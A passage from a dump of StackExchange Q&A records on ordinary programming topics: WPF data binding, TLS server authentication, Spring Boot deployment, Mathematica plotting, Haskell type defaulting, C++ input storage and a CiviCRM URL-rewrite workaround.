VerticalAlignment=\"Top\" Width=\"149\" DataContext=\"{Binding Source={StaticResource PersonDataSource}}\"\/>\n <TextBox HorizontalAlignment=\"Left\" Height=\"19\" Margin=\"37,197,0,0\" TextWrapping=\"Wrap\" Text=\"{Binding Path=ID,Mode=TwoWay,UpdateSourceTrigger=PropertyChanged}\" VerticalAlignment=\"Top\" Width=\"149\" DataContext=\"{Binding Source={StaticResource PersonDataSource}}\"\/>\n <Button Content=\"Update\" HorizontalAlignment=\"Left\" Height=\"24\" Margin=\"37,291,0,0\" VerticalAlignment=\"Top\" Width=\"149\"\/>\n <Button Command=\"{Binding _addCommand}\" Content=\"edit\" HorizontalAlignment=\"Left\" Height=\"21\" Margin=\"272,291,0,0\" VerticalAlignment=\"Top\" Width=\"149\"\/>\n <ListView HorizontalAlignment=\"Left\" Height=\"120\" Margin=\"246,150,0,0\" VerticalAlignment=\"Top\" Width=\"366\" ItemsSource=\"{Binding MasterData}\">\n <ListView.View>\n <GridView>\n <GridViewColumn Header=\"Name\" Width=\"120\">\n <GridViewColumn.CellTemplate>\n <DataTemplate>\n <TextBlock Text=\"{Binding Name}\" TextWrapping=\"Wrap\"\/> \n <\/DataTemplate> \n <\/GridViewColumn.CellTemplate> \n <\/GridViewColumn>\n <GridViewColumn Header=\"ID\" Width=\"120\">\n <GridViewColumn.CellTemplate>\n <DataTemplate>\n <TextBlock Text=\"{Binding ID}\" TextWrapping=\"Wrap\"\/>\n <\/DataTemplate>\n <\/GridViewColumn.CellTemplate>\n <\/GridViewColumn>\n <GridViewColumn Header=\"Location\" Width=\"125\">\n <GridViewColumn.CellTemplate>\n <DataTemplate>\n <TextBlock Text=\"{Binding Location}\" TextWrapping=\"Wrap\"\/>\n <\/DataTemplate>\n <\/GridViewColumn.CellTemplate>\n <\/GridViewColumn>\n <\/GridView>\n <\/ListView.View>\n <\/ListView>\n <TextBox HorizontalAlignment=\"Left\" Height=\"19\" Margin=\"37,241,0,0\" TextWrapping=\"Wrap\" Text=\"{Binding Path=Location,Mode=TwoWay,UpdateSourceTrigger=PropertyChanged}\" VerticalAlignment=\"Top\" Width=\"149\" DataContext=\"{Binding Source={StaticResource PersonDataSource}}\"\/>\n\n<\/Grid>\n<\/Controls:MetroWindow>\n<\/code>\nComment: add it in your question\nComment: I want to add new record to my observablecollection\nComment: just add the object ti the collection\nComment: NotifyOnSourceUpdated=true,NotifyOnTArgetUpdated=true will help you\nAnswer: Since I could not use your code snippet to reproduce your issue accurately. So I have made a simple code sample to achieve your target as you described. I believe you would get some useful information form it and check your code to solve your problem.\n<code><Grid>\n <Grid.ColumnDefinitions>\n <ColumnDefinition>\n\n <\/ColumnDefinition>\n <ColumnDefinition>\n\n <\/ColumnDefinition>\n <\/Grid.ColumnDefinitions>\n\n <StackPanel Grid.Column=\"0\">\n <TextBox Text=\"{Binding name,Mode=TwoWay}\"><\/TextBox>\n\n <TextBox Text=\"{Binding Id,Mode=TwoWay}\"><\/TextBox>\n\n <TextBox Text=\"{Binding location,Mode=TwoWay}\"><\/TextBox>\n\n <Button Content=\"add new\" Command=\"{Binding AddNew}\"><\/Button>\n <\/StackPanel>\n\n <ListView ItemsSource=\"{Binding persons}\" Grid.Column=\"1\">\n <ListView.ItemTemplate>\n <DataTemplate>\n <StackPanel>\n <TextBlock Text=\"{Binding Name}\"><\/TextBlock>\n <TextBlock Text=\"{Binding ID}\" Margin=\"10 0 0 0\"><\/TextBlock>\n\n <TextBlock Text=\"{Binding Location}\" Margin=\"20 0 0 0\"><\/TextBlock>\n <\/StackPanel>\n <\/DataTemplate>\n <\/ListView.ItemTemplate>\n <\/ListView>\n<\/Grid>\n<\/code>\nMainViewModel.cs\n<code>class MainViewModel:ViewModelBase\n{\n public ObservableCollection<PersonModel> persons { get; set; }\n\n private string _name;\n public string name\n {\n get { return _name; }\n set\n {\n _name = value;\n RaisePropertyChanged(\"name\");\n }\n }\n\n private string _Id;\n\n public string Id\n {\n get { return _Id; }\n set { _Id = value;\n RaisePropertyChanged(\"Id\");\n }\n }\n\n private string _location;\n\n public string location\n {\n get { return _location; }\n set { _location = value;\n RaisePropertyChanged(\"location\");\n }\n }\n\n public RelayCommand AddNew { get; set; }\n\n public MainViewModel()\n {\n persons = new ObservableCollection<PersonModel>();\n persons.Add(new PersonModel() {Name=\"test1\",ID=\"123\",Location=\"u.s.\" });\n AddNew = new RelayCommand(AddNewPerson);\n }\n\n private void AddNewPerson()\n {\n PersonModel p = new PersonModel() {Name=name,ID=Id,Location=location };\n persons.Add(p);\n }\n}\n<\/code>\nPersonModel.cs\n<code>class PersonModel\n{\n public string Name { get; set; }\n\n public string ID { get; set; }\n\n public string Location { get; set; }\n}\n<\/code>\n","meta":{"source":"stackoverflow","title":"Get TextBox Value in ViewModel","dup_signals":{}},"subset":"stackexchange"} +{"text":"Make sure the data came from the server\n\nQuestion: So a web app grabs data from a server with ajax. I'm interested to know whether there is some cryptography wizardy that would make sure the data came from that server. For example, someone can edit their hosts file and use a different server for the domain and pass different data to the web app without modifying it. \nI'm thinking on something like this: \n<code>Server:\ndata_to_send \/\/ stringified json\nintegrity_code = getCode(data_to_send); \/\/generates a code from the string.\n\nThe server outputs data_to_send and integrity_code\n\nThen the client \nif (checkCode(data_to_send, integrity_code))\n \/\/all fine\n<\/code>\nI'm a total newbie to cryptography, but the idea is to have some secret algorithm on the server which no one can see and public algorithm on the client that determines if data is integral. Can something like that be done?\nComment: SSL\/TLS does just that.\nComment: if someone wants to interact with a different site, there's easier ways of doing that than manipulating your app's host usage, i don't understand the concern.\nAnswer: The simplest solution is to implement TLS encryption and use it when querying the server. TLS traffic between the server and the other server hosting your webapp is going to be encrypted and the authority of the server properly validated. Having SSL\/TLS installed however, does not automatically mean your app is using it, you still have to change the endpoint URLs from <code>http:\/\/<\/code> to <code>https:\/\/<\/code> in your ajax requests.\nEdit: pragmatically I recommend <code>letsencrpyt<\/code> if using linux, it's no more than 5 minutes to be installed for apache or nginx.\nComment: I can second using the EFF's project, let's encrypt (https:\/\/letsencrypt.org\/). I used it on my server, which I host multiple sites on, and it was VERY easy to setup. My blog for validation https:\/\/www.DotNetRussell.com it's pretty good too. I got an A- on SSLLabs https:\/\/www.ssllabs.com\/ssltest\/analyze.html?d=dotnetrussell.com not bad for a raspberry pi lol\nComment: I'm already using Letsencrypt. But will SSL ensure the data comes from the server, even when user changed the domain in hosts file and serving the request from his own server, which also has SSL?\nComment: CA's prove the authority of the server reliably as they have no access to your local hosts files. Certs are issued for a specific domain which in public DNS points to your IP.\nAnswer: If the user of your system is motivated to subvert the client side of your system, then there's little you can do. Digital Rights Management (DRM) systems try to do something similar, with limited success. \nIf going down this path can be avoided, it should be. \nComment: How come it isn't to do with DRM? The requester is explicitly saying that he wants to protect against situations where the end user could change \/etc\/hosts file and point to another server and his application should be protected against that.\nComment: @LukePark you should realize that if the user changes \/etc\/hosts file, and trusts his\/her own CA, you can easily impersonate any website. Done all the time.\nComment: This doesn't really have anything to do with DRM. A client can ensure it is communicating with the server it thinks it is through the use of TLS.\nComment: You should probably read up on how TLS works. Even if the user changed their hosts file to a different server, that server wouldn't be able to act as the original because it doesn't have the private key of the original server.\nComment: Yes, this is exactly what I meant. To make it harder to reverse engineer it.\nComment: They would need a CA to sign a certificate for the same domain as the one they are trying to impersonate... Which no actual CA would do unless the person who is applying actually controlled that domain... Which the attacker obviously doesn't.\nComment: You can easily mint your own CA and trust in your browser. And have that CA sign any certificate of your choice. The requester is saying that the user is motivated to subvert the security, and wants to make reverse engg harder.\nComment: I thought we were assuming the use of certificate pinning here? This **is** possible without certificate pinning or HSTS but I assume they would be implemented here. In which case, it is not possible.\nComment: @LukePark: pinning might prevent this, but _browser_ builtin pinning can usually be altered by a skilled user, and so can any pin done by app logic running in the browser. HSTS doesn't try; it requires HTTPS not HTTP (defeating sslstrip and things like Firesheep) but doesn't change the normal rule of trusting every CA in the truststore.\nAnswer: As mentioned in another answer, TLS (HTTPS) includes authentication, which is intended to provide the sort of guarantee you're looking for. There are also a variety of other cryptographic tools for the more general problem; GPG is a common signing tool for email, for example.\nHowever, while your gut instinct to not trust that the server you're querying is the right one is correct, you haven't taken it far enough. You should generally assume that any code that runs on the client can be subverted entirely - so if an attacker wants to, they can just change the code so it doesn't make any requests at all, and just uses some hard-coded values that they want.\nIn client-server models like web apps and online games, the way to prevent this is to always verify actions on the server. You can still do calculations on the client, but never consider them to be trusted; everything has to be verified by the server before it's considered truth. I don't know what your app is doing specifically, but to provide an example from ecommerce, you can't just trust the client to tell you that they've paid for something; the server needs to do the payment processing (or send it off to an external trusted service to do that), and only then do you proceed with shipping them their item.\nComment: Yes I'm aware of it. But now I thought, this is not the solution to what I want. Chrome extensions can have permissions to read and change data on websites I guess it also includes encrypted websites. Someone could make an extension that would change the ajax data. But if I encrypted the message on the server and decrypted on the client, it would be much harder to do and would require modification of source code, am I right? I just want to prevent scenarios where the response could be tampered without even touching the source code.\n","meta":{"source":"security.stackexchange","title":"Make sure the data came from the server","dup_signals":{}},"subset":"stackexchange"} +{"text":"Confused on how to properly work on \/ install Spring files\n\nQuestion: I am trying to set up a simple restful API on my Linode server for my Android app to communicate with. I am new to the area of server software and setup.\nSo I have this guide:\nhttps:\/\/spring.io\/guides\/gs\/rest-service\/#scratch\nAm I developing this project on my local machine and then, at the end, somehow moving it all over to the server? I am confused how I \"install the Spring framework\" on the server, even with this guide, or what exactly I need to do to set things up.\nAm I supposed to create the whole thing locally, generate the jar, upload that jar to the server, and just run it directly there and it'll handle the rest?\nAnswer: As this is a spring boot application, you will have two possibilities:\nThe default is to just build the projects jar and run it on the target system, because spring boot allows you to embed a tomcat container into your project.\nThe second one would be to package your project into a .war file (<code>packaging<\/code> property in the <code>pom.xml<\/code>) and deploy this .war file in a tomcat container you previously installed on the server.\nEDIT:\nYou don't have to \"install the spring framework on your server\". You app is based on the spring framework, that's it. Just build your app (with maven or gradle according to the tutorial) and run the .jar on the server (<code>java -jar yourapp.jar<\/code>). As there is an embedded, pre-configured tomcat included in the spring-boot framework, it will run the tomcat, deploy your app and run the app for you.\nComment: Can I build this Spring app in Android Studio or do I need to use something like IntelliJ IDEA?\nComment: i think it's make more sense to use something else than Android Studio. I bet it would work, but it's specialized to develop android apps. Use eclipse or intelliJ instead.\nAnswer: First of all you need to understand that spring is an application, to connect to that application you need any server to deploy your application like Tomcat, GlassFish, etc.\nOnce you have your own server, you need to export your spring.jar or spring.war to the server to make it running.\nThen when the app is running you can connect to that using the URLNameOfYourServer\/YourSpringApp\nAnother thing is when you are using STS, Eclipse, Netbeans, Intellij those IDES uses embedded server to deploy and test your app.\nIf you want to create your own server, make sure you have installed java and tomcat then deploy your app.\nComment: Well yes, but it's not forbidden to use the embedded tomcat in production. Many people do so successfully. It just depends on what you need. If you only want one app per container anyway, the embedded tomcat is a nice feature to use, here.\nComment: I don't see anywhere in the online guide I linked above that I need to install Tomcat?\nComment: I use an easy way with pivotal cloud foundy [Link Here](https:\/\/pivotal.io\/platform) look at the starter guide for spring apps if your are new configuring web servers this should be the best choice for you.\nComment: @IvanLynch This ultimately redirects to the same tutorial pages I already linked\nComment: Check this [Host your application in Linode](https:\/\/www.linode.com\/docs\/websites\/hosting-a-website), install apache tomcat following the guide. Once apache is installed copy your war file to webapps directory of Apache tomcat\n","meta":{"source":"stackoverflow","title":"Confused on how to properly work on \/ install Spring files","dup_signals":{}},"subset":"stackexchange"} +{"text":"Plots are clipped randomly (almost)\n\nQuestion: I am experiencing a strange behavior in plotting a lot of functions. Basically, they are clipped within an horizontal range. Let try to run this code by varying nmax, it could be a problem of my specific configuration(?). I know that is not a problem about Manipulate since I can reproduce the same behavior with a static plot. Rather it seems to be a problem related to point numbers, indeed if you try to sharpen the gaussians the problem appears.\n<code>nmax = 5;\nManipulate[\nDynamicModule[{rr = r[[1 ;; n]], ss = s[[1 ;; n]], \n ww = w[[1 ;; n]]},\n Show[\n Plot[Table[\n PDF[NormalDistribution[rr[[i]], ss[[i]]], x], {i, 1, n}], {x, 0, \n 5}, PlotRange -> {{0, 5}, {0, 1.4}}, Frame -> True]\n ]\n ],\n{{r, RandomReal[{0, 3}, nmax]}, ControlType -> None},\n{{s, RandomReal[{0.01, 1}, nmax]}, ControlType -> None},\n{{w, RandomReal[{0, 1}, nmax]}, ControlType -> None},\n{{n, 1}, 1, nmax, 1},\nDynamic[\nGrid[\nTable[With[{i = i},\n {Row[{Slider[Dynamic[r[[i]]], {0, 5, 0.1}], Dynamic[r[[i]]]}], \n Row[{Slider[Dynamic[s[[i]]], {0.01, 1, 0.1}], \n Dynamic[s[[i]]]}]}\n], {i, n}]\n]\n],\nControlPlacement -> Left\n]\n<\/code>\nWhat do you think about?\nThank you very much\nF\nComment: I don't understand what you mean is clipped. Can you show with an image? I run your code, and nothing strange appears to me. Some of the graphs go outside the PlotRange that is explicitly given, but that is not surprising.\nComment: Why not post the (probably simpler) code for the static image?\nComment: Because it would not be simpler than this, since it involves kernel density estimation computation, a histogram, the pdf reconstruction and its \"manual\" reconstruction. The code above reproduces the same effect\/problem but with less code... and the solution is to give the right option in Plot[] (I guess)\nAnswer: This is the problem you are seeing:-\n\nIn your code <code>Show<\/code> is actually doing nothing, since <code>Plot<\/code> is plotting all the tabled functions (and that's where the problem is occurring). The problem is fixed by by rearranging <code>Plot<\/code> and <code>Table<\/code> so that plots are tabled, then shown with <code>Show<\/code>. I.e.\n<code>nmax = 5;\nManipulate[\n DynamicModule[{rr = r[[1 ;; n]], ss = s[[1 ;; n]], ww = w[[1 ;; n]]},\n Show[Table[Plot[PDF[NormalDistribution[rr[[i]],\n ss[[i]]], x], {x, 0, 5}, PlotRange -> {{0, 5}, {0, 1.4}}, Frame -> True],\n {i, 1, n}]]],\n {{r, RandomReal[{0, 3}, nmax]}, ControlType -> None},\n {{s, RandomReal[{0.01, 1}, nmax]}, ControlType -> None},\n {{w, RandomReal[{0, 1}, nmax]}, ControlType -> None}, {{n, 1}, 1, nmax, 1},\n Dynamic[Grid[Table[With[{i = i},\n {Row[{Slider[Dynamic[r[[i]]], {0, 5, 0.1}], Dynamic[r[[i]]]}],\n Row[{Slider[Dynamic[s[[i]]], {0.01, 1, 0.1}], \n Dynamic[s[[i]]]}]}], {i, n}]]],\n ControlPlacement -> Left]\n<\/code>\n","meta":{"source":"mathematica.stackexchange","title":"Plots are clipped randomly (almost)","dup_signals":{}},"subset":"stackexchange"} +{"text":"Int literal in Haskell\n\nQuestion: I am trying out code examples from the book \"The Craft of Functional Programming\".\nI want to create a Tree that has <code>Int<\/code>s in it but I seem to ended up creating a Tree with Integers in it (please see execution in GHCi below). \nHow can I create a Tree with <code>Int<\/code>s in it ? Is there a way to write an <code>Int<\/code> literal in Haskell ?\n<code>*Chapter18> sumTree myTree\n\n<interactive>:35:9:\n Couldn't match type `Integer' with `Int'\n Expected type: Tree Int\n Actual type: Tree Integer\n In the first argument of `sumTree', namely `myTree'\n In the expression: sumTree myTree\n In an equation for `it': it = sumTree myTree\n<\/code>\nHere is the corresponding code:\n<code>-- A type of binary trees.\nmyTree = Node 2 (Nil) (Nil)\n\ndata Tree a = Nil | Node a (Tree a) (Tree a)\n\n-- Summing a tree of integers\n\n-- A direct solution:\n\nsTree :: Tree Int -> Int\n\nsTree Nil = 0\nsTree (Node n t1 t2) = n + sTree t1 + sTree t2\n\n-- A monadic solution: first giving a value of type Id Int ...\n\nsumTree :: Tree Int -> Id Int\n\nsumTree Nil = return 0\n\n--sumTree (Node n t1 t2)\n-- = do num <- return n\n-- s1 <- sumTree t1\n-- s2 <- sumTree t2\n-- return (num + s1 + s2)\nsumTree (Node n t1 t2) =\n return n >>=(\\num ->\n sumTree t1 >>= (\\s1 ->\n sumTree t2 >>= (\\s2 ->\n return (num + s1 + s2))))\n-- ... then adapted to give an Int solution\n\nsTree' :: Tree Int -> Int\n\nsTree' = extract . sumTree\n\n-- where the value is extracted from the Id monad thus:\n\nextract :: Id a -> a\nextract (Id x) = x\n<\/code>\nAnswer: Monomorphism restriction strikes again! Because <code>myTree<\/code> doesn't have any arguments, the compiler avoids making it polymorphic. But the numerical literal is polymorphic (there are no <code>Int<\/code> literals, only integral <code>Num<\/code> literals!), so the compiler needs to decide upon some <code>Num<\/code> type. Well, <code>Int<\/code> could be a problem if you're dealing with huge numbers, so it chooses <code>Integer<\/code>.\nGiving <code>myTree<\/code> an explicit signature would have prevented that; either use\n<code>myTree :: Num a => Tree a\n<\/code>\nOr\n<code>myTree :: Tree Int\n<\/code>\n","meta":{"source":"stackoverflow","title":"Int literal in Haskell","dup_signals":{}},"subset":"stackexchange"} +{"text":"storing all user inputs and display later\n\nQuestion: I'm nearly finishing my practice program but I got stucked on storing user inputs in an unspecified size of an array..\nPlease have a look at my code:\n<code>#include <iostream>\n#include <stdlib.h>\n#include <string>\n#include <ctype.h>\n#include <cstring>\n\nusing namespace std;\n\nint main() {\n\n string items[9][3] = {{\"A\",\"BALOT\",\"25.00\"},\n {\"B\",\"CANTON\",\"20.00\"},\n {\"C\",\"NIDO\",\"100.00\"},\n {\"D\",\"KETCHUP\",\"50.00\"},\n {\"E\",\"MAGGI\",\"15.00\"},\n {\"F\",\"ALASKA\",\"60.00\"},\n {\"G\",\"VINEGAR\",\"25.00\"},\n {\"H\",\"OIL\",\"70.00\"},\n {\"I\",\"COKE\",\"10.00\"}};\n\n \/\/ PARA MAPRINT YUNG ARRAY.\n cout << \"MANG JUAN'S 10-DAHAN\\n\\n\";\n for (int i = 0; i < 9; i++) {\n for (int j = 0; j < 3; j++)\n cout << items[i][j] << ( (j < 2) ? \"-\" : \"\\t\" ); \n\n if (i < 6) {\n cout << \"\\t\";\n i += 2;\n }\n else if (i != 8) { \n cout << \"\\n\";\n i -= 6;\n }\n } \/\/ END OF ARRAY PRINTING\n\n char choice, addAnother;\n int ctr = 1, quantity = 0;\n string purchased;\n double price = 0, grandTotal = 0, total = 0;\n\n cout << \"\\n\\nWOULD YOU LIKE TO PURCHASE? Y\/N\\n\\n\";\n cin >> choice;\n\n if(choice == 'n' || choice == 'N') {\n cout << \"THANK YOU.\";\n }\n else if(choice == 'y' || choice == 'Y') {\n\n string numPref;\n while (true) {\n if(ctr > 11) {\n cout << \"\\n\\nTHE SYSTEM EXCEEDED ITS LIMIT\\n\\n\";\n break;\n } else {\n if(ctr == 1) numPref = \"st\";\n else if(ctr == 2) numPref = \"nd\";\n else if(ctr == 3) numPref = \"rd\";\n else if(ctr > 3) numPref = \"th\";\n }\n\/\/rows:\n \/\/for(int r = 0; r < 9; r++) {\n cout << \"\\n\\nPLEASE ENTER \" << ctr << numPref << \" ITEM:\\t\";\n cin >> purchased;\n\n char upp = purchased[0];\n upp = toupper(upp);\n purchased = upp;\n\n if(!cin) { \n cout << \"Letters only\";\n break;\n } else {\n if(true) {\n cout << \"HOW MANY? \";\n cin >> quantity;\n if(!cin) {\n cout << \"Enter number only. \";\n break;\n } else {\n cout << \"PRICE PER ITEM: \";\n\n \/\/\/\/\/\/\/\/\/ Look for the element and print the entire row \/\/\/\/\/\/\/\/\/\/\/\/\/\n string *matchedRow;\n const int length = 9;\n for (int i = 0; i < 9; i++) {\n string *oneRow = items[i];\n \/**if (oneRow[0] != purchased) {\n cout << \"\\n\\nNO ITEM FOUND!\\n\\n\";\n ctr--;\n } else {\n matchedRow = oneRow;\n cout << matchedRow[2];\n price = atof( matchedRow[2].c_str() ); \n total = price * quantity;\n grandTotal += total; \n } *\/\n\n if(oneRow[0] == purchased) {\n matchedRow = oneRow;\n cout << matchedRow[2];\n price = atof( matchedRow[2].c_str() ); \n total = price * quantity;\n grandTotal += total;\n\n if(oneRow[0] != purchased) {\n cout << \"NO MATCH FOUND!\" << endl;\n ctr--;\n break;\n }\n\n }\n\n } \/\/ End of for-loop for *matchedrow\n \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n cout << \"\\n\\nADD ANOTHER ITEM? Y\/N \" << endl;\n cin >> addAnother;\n if(addAnother == 'y' || addAnother == 'Y') {\n ctr++; \n } else if(addAnother == 'n' || addAnother == 'N') {\n \/\/ print the receipt here\n goto receipt;\n \/\/break; \/\/ replace break with goto later\n } else {\n cout << \"\\n\\nINVALID INPUT.\" << endl;\n break;\n } \/\/ End of if and else for addANother\n }\n\n } \/\/ end of else - if (!cin) for quantity input check\n } \/\/ end of char check\n\n \/\/} \/\/ End of else for (!cin) \/\/spare bracket\n\n } \/\/ End of while-loop for numPref\n \/\/} \/\/ end of rows for-loop \n } \/\/ End of else if (choice)\nreceipt:\n cout << \"YOUR PURCHASE:\" << endl;\n cout << \"NET TOTAL: \" << grandTotal << endl;\n system(\"PAUSE\");\n \/\/return 0;\n\n}\n<\/code>\nI want to output the purchase summary like this sample run:\n<code>WOULD YOU LIKE TO PURCHASE? Y\nPLEASE ENTER 1st ITEM: A\nHOW MANY? 2\nPRICE PER ITEM: 25.00\n\nADD ANOTHER? Y\n\nPLEASE ENTER 2nd ITEM: B\nHOW MANY? 1\nPRICE PER ITEM: 20.00\n\nADD ANOTHER? N\n\nYOUR PURCHASE:\n\/\/ will display all the ordered item\n\/\/ sample output\nA BALOT 50.00\nB CANTON 20.00\n\nNET TOTAL: 70.00\n<\/code>\nComment: This is *screaming* for a well-defined `struct` or `class` that contains the choice-letter, description, and an `int` for the price in pennies (not a float or double; rounding sucks). That aside, do you know what a `std::vector<>` is useful for?\nComment: Honestly, its more important than even `std::string`. If you asked me which is the *first* standard library class you should learn everything about, `std::vector<>` would likely be the choice.\nComment: I'm not yet familiar of std::vector<> since I'm new to C++\nAnswer: You cannot have an array of unspecified size. Use <code>vector<\/code> instead, for example:\n<code>#include<vector>\n... \nvector<string> user_inputs;\nstring purchased;\ncin >> purchased;\nuser_inputs.push_back(purchased); \/\/adding to vector\n<\/code>\nThen you can get back your inputs:\n<code>for (int j = 0; j < user_inputs.size(); j++)\n cout << user_inputs[j];\n<\/code>\nComment: how do you print an entire row if the user_input matches an element in an array?\nAnswer: -As someone mentioned, abstraction is needed here, but you can choose to implement that if you wish\n<code>#include <deque>\n#include <string>\n#include <iostream>\n#include <limits>\n#include <cstdlib>\n#include <iomanip>\n#include <cctype>\n\nusing std::cout;\nusing std::endl;\nusing std::cin;\nusing std::string;\n\ntypedef std::deque<string> dstr;\ntypedef std::deque<dstr> ddstr;\n\nstruct purchase_index {\n string name;\n double amt;\n struct purchase_index *next;\n} purchases;\n\nconst char *prefix[] = {\"st\", \"nd\", \"rd\", \"th\"};\n\nint query( const unsigned );\nvoid print_options(ddstr &);\nunsigned add_purchase( purchase_index *, ddstr & );\nvoid clrscr();\nvoid print_purchase_hist(struct purchase_index *, char = '$');\n\nint main() {\n ddstr items = {{\"A\",\"BALOT\",\"25.00\"},\n {\"B\",\"CANTON\",\"20.00\"},\n {\"C\",\"NIDO\",\"100.00\"},\n {\"D\",\"KETCHUP\",\"50.00\"},\n {\"E\",\"MAGGI\",\"15.00\"},\n {\"F\",\"ALASKA\",\"60.00\"},\n {\"G\",\"VINEGAR\",\"25.00\"},\n {\"H\",\"OIL\",\"70.00\"},\n {\"I\",\"COKE\",\"10.00\"}\n };\n\n struct purchase_index *ptr = &purchases;\n\n unsigned char prompt = 'y'; \n cout << \"\\n\\nWOULD YOU LIKE TO PURCHASE? \";\n int purchase(1);\n\n while ( (cin >> prompt) and (prompt|32) == 'y' ) {\n print_options(items);\n if ( !query(purchase) ) break;\n else if ( add_purchase(ptr, items) ) {\n purchase++;\n ptr = (ptr->next = new struct purchase_index());\n }\n cout << \"ADD ANOTHER? \";\n }\n\n print_purchase_hist(&purchases);\n\n return 0;\n}\n\nvoid print_purchase_hist(struct purchase_index *hist, char currency) {\n cout << \"\\n\\nYOUR PURCHASE:\\n\";\n struct purchase_index *ptr = hist;\n while (ptr->next != NULL){\n cout << ptr->name << \"\\t\" << currency << ptr->amt << '\\n';\n ptr = ptr->next;\n }\n}\n\ninline void clrscr() {\n cin.ignore(std::numeric_limits<std::streamsize>::max(), '\\n');\n cout << std::setfill('\\n') << std::setw(2) << '\\n';\n}\n\nunsigned add_purchase( purchase_index *ptr, ddstr &itm ) {\n unsigned char w;\n unsigned num, index, ret(1);\n if ( !(cin >> w) or (index = (toupper(w) - 65)) >= itm.size() ) {\n cout << \"NO MATCH FOUND!\\n\";\n ret = 0;\n }\n else if ( cout << \"HOW MANY? \" and !(cin >> num) ) {\n cout << \"Enter Numbers only.\\n\";\n ret = 0;\n }\n else {\n ptr->name = itm[index][0] + \"\\t\" + itm[index][1];\n ptr->amt = (double)num * atof(itm[index][2].c_str());\n }\n clrscr();\n return ret;\n}\n\nvoid print_options(ddstr &ref) {\n cout << \"Items you can purchase:\\n\";\n for ( auto desc: ref ) {\n cout << \"\\t\";\n for ( auto spec: desc )\n cout << spec << \" \";\n cout << endl;\n }\n}\n\nint query( const unsigned item_list ) {\n if ( item_list > 11 ) {\n cout << \"\\n\\nTHE SYSTEM EXCEEDED ITS LIMIT\\n\\n\";\n return 0;\n }\n unsigned last = item_list % 10;\n cout << \"PLEASE ENTER THE \" << item_list\n << ( last == 0 || last > 3 ? prefix[3] : prefix[last-1] )\n << \" ITEM: \";\n return 1;\n}\n<\/code>\nSample Run:\n<code>WOULD YOU LIKE TO PURCHASE? y\nItems you can purchase:\n A BALOT 25.00 \n B CANTON 20.00 \n C NIDO 100.00 \n D KETCHUP 50.00 \n E MAGGI 15.00 \n F ALASKA 60.00 \n G VINEGAR 25.00 \n H OIL 70.00 \n I COKE 10.00 \nPLEASE ENTER THE 1st ITEM: e\nHOW MANY? 3\n\nADD ANOTHER? y\nItems you can purchase:\n A BALOT 25.00 \n B CANTON 20.00 \n C NIDO 100.00 \n D KETCHUP 50.00 \n E MAGGI 15.00 \n F ALASKA 60.00 \n G VINEGAR 25.00 \n H OIL 70.00 \n I COKE 10.00 \nPLEASE ENTER THE 2nd ITEM: c\nHOW MANY? 5\n\nADD ANOTHER? n\n\nYOUR PURCHASE:\nE MAGGI $45\nC NIDO $500\n<\/code>\n","meta":{"source":"stackoverflow","title":"storing all user inputs and display later","dup_signals":{}},"subset":"stackexchange"} +{"text":"CiviCRM is defaulting to uppercase path\n\nQuestion: Somehow CiviCRM is wanting to use the path \/CiviCRM (notice the case) instead of all lowercase civicrm. This has been fine until I upgraded to Civi 5.27 and now the civicrm?civiwp implementation results in a 404. I can change the case manually and it will work but the automatically generated URLs use all lowercase.\nFor example:\nhttps:\/\/www.domain.org\/civicrm?civiwp=CiviCRM&q=civicrm%2Fevent%2Fregister&reset=1&id=24 == 404 Not Found\nhttps:\/\/www.domain.org\/CiviCRM\/?civiwp=CiviCRM&q=civicrm%2Fevent%2Finfo&reset=1&id=24 == working\nThis is also breaking images in my Mosaico templates.\nExample of a Mosaico image:\nhttps:\/\/www.domain.org\/civicrm?civiwp=CiviCRM&q=civicrm%2Fmosaico%2Fimg&src=https%3A%2F%2Fwww.domain.org%2Fwp-content%2Fuploads%2Fcivicrm%2Fpersist%2Fcontribute%2Fimages%2Fuploads%2Fdcs_e1de5c0ee5de2a85bb86821132d2aaba.png&method=resize¶ms=166%2Cnull\nIf you change the link to \/CiviCRM?civiwp=CiviCRM.... it works.\nI have verified that the permalink on the page is lowercase as well as the CMS Database Integration in Civi. Has anyone seen this behavior or have any suggestions for how I can correct it?\nUPDATE:\nAdding the following lines to my htaccess fixes this as a workaround. Still not sure why it is defaulting to CiviCRM instead of civicrm. Hopefully if this is happening to you, you can use this patch.\n<code>RewriteCond %{REQUEST_URI} !^\/wp-content\/\nRewriteRule ^(.*)\/civicrm(.*)$ \/$1\/CiviCRM\/$2 [R,L]\n<\/code>\nAnswer: Can you check the CMS Settings <code>https:\/\/yoursite.org\/\/wp-admin\/admin.php?page=CiviCRM&q=civicrm%2Fadmin%2Fsetting%2Fuf&reset=1<\/code> and see what you see?\nI suspect it looks like:\n\nCan you also check the WP Page 'CiviCRM' I suspect the slug is not 'civicrm' lowercase. These values must match in order for the urls to resove.\nComment: Hi Kevin, thanks for the quick reply. Both the page slug and Base Page are lowercase. I've updated my question with the screenshots of each.\nComment: That is really odd. As they both match it should work. Is it possible there is a civicrm folder in the web root\nComment: Even stranger is that if you go to \/civicrm it gives you a server side 404. If you go to any other non existent folder (ie. \/civistack) it will serve a html page 404. I can't even do a 301 rewrite for the \/civicrm folder to force it to CiviCRM. This is really strange.\nComment: Can anyone add further suggestions or insight? This is breaking Mosaico templates and we're not able to send mailings. See the two new examples in the original post. \nCould I use a rewrite in the htaccess to rewrite all requests for civicrm?civiwp= to CiviCRM?civiwp= ? If so, how would I do that? Thanks!\nComment: Partial answer... adding the following in htaccess fixes the links but breaks the admin pages for civi... getting closer to a workaround...\n\nRewriteRule ^(.*)\/civicrm(.*)$ \/CiviCRM\/$2 [L]\nRewriteRule ^(.*)\/civicrm(.*)$ \/$1\/CiviCRM\/$2 [R,L]\nAnswer: This is a .htaccess workaround but I have tested and verified that it works. Please the following in your root .htaccess file or httpd-app.conf:\n<code>RewriteCond %{REQUEST_URI} !^\/wp-content\/\nRewriteRule ^(.*)\/civicrm(.*)$ \/$1\/CiviCRM\/$2 [R=301,L]\n<\/code>\nIf someone from the community cares enough to look into why this is defaulting to CiviCRM when everything is set to civicrm, please do. Otherwise this band-aid will have to do.\n","meta":{"source":"civicrm.stackexchange","title":"CiviCRM is defaulting to uppercase path","dup_signals":{}},"subset":"stackexchange"} +{"text":"How can one parallelize tasks in CTR-AES for maximum performance?\n\nQuestion: From what I have read it seems like one of the purported benefits of using CTR mode AES, is that it can be parallelized to a greater degree, or maybe more easily than the other block cipher modes, leading to performance 